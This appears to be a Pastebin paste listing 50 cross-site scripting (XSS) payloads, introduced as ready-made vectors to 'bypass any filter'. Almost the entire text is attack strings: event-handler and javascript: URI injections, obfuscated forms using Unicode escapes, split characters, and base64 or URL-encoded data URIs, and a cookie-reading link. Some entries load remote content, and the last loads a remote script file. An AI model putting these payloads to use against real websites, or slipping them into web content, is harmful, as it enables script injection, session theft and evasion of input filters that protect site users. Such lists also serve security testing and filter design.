Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)
- 1) <a href="javascript:\u0061le%72t(1)"><button>
- 2) <div onmouseover='alert(1)'>DIV</div>
- 3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
- 4) <a href="jAvAsCrIpT:alert(1)">X</a>
- 5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- 6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- 7) <var onmouseover="prompt(1)">On Mouse Over</var>
- 8) <a href=javascript:alert(document.cookie)>Click Here</a>
- 9) <img src="/" =_=" title="onerror='prompt(1)'">
- 10) <%<!--'%><script>alert(1);</script -->
- 11) <script src="data:text/javascript,alert(1)"></script>
- 12) <iframe/src \/\/onload = prompt(1)
- 13) <iframe/onreadystatechange=alert(1)
- 14) <svg/onload=alert(1)
- 15) <input value=<><iframe/src=javascript:confirm(1)
- 16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
- 17) http://www.<script>alert(1)</script .com
- 18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
- 19) <svg><script ?>alert(1)
- 20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- 21) <img src=`xx:xx`onerror=alert(1)>
- 22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
- 23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
- 24) <math><a xlink:href="//jsfiddle.net/t846h/">click
- 25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- 26) <svg contentScriptType=text/vbs><script>MsgBox+1
- 27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
- 28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
- 29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
- 30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
- 31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- 32) <object data=javascript:\u0061le%72t(1)>
- 33) <script>+-+-1-+-+alert(1)</script>
- 34) <body/onload=<!-->
alert(1)>
- 35) <script itworksinallbrowsers>/*<script* */alert(1)</script
- 36) <img src ?itworksonchrome?\/onerror = alert(1)
- 37) <svg><script>//
confirm(1);</script </svg>
- 38) <svg><script onlypossibleinopera:-)> alert(1)
- 39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- 40) <script x> alert(1) </script 1=2
- 41) <div/onmouseover='alert(1)'> style="x:">
- 42) <--`<img/src=` onerror=alert(1)> --!>
- 43) <script/src=data:text/javascript,alert(1)></script>
- 44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
- 45) "><img src=x onerror=window.open('https://www.google.com/');>
- 46) <form><button formaction=javascript:alert(1)>CLICKME
- 47) <math><a xlink:href="//jsfiddle.net/t846h/">click
- 48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
- 49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
- 50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement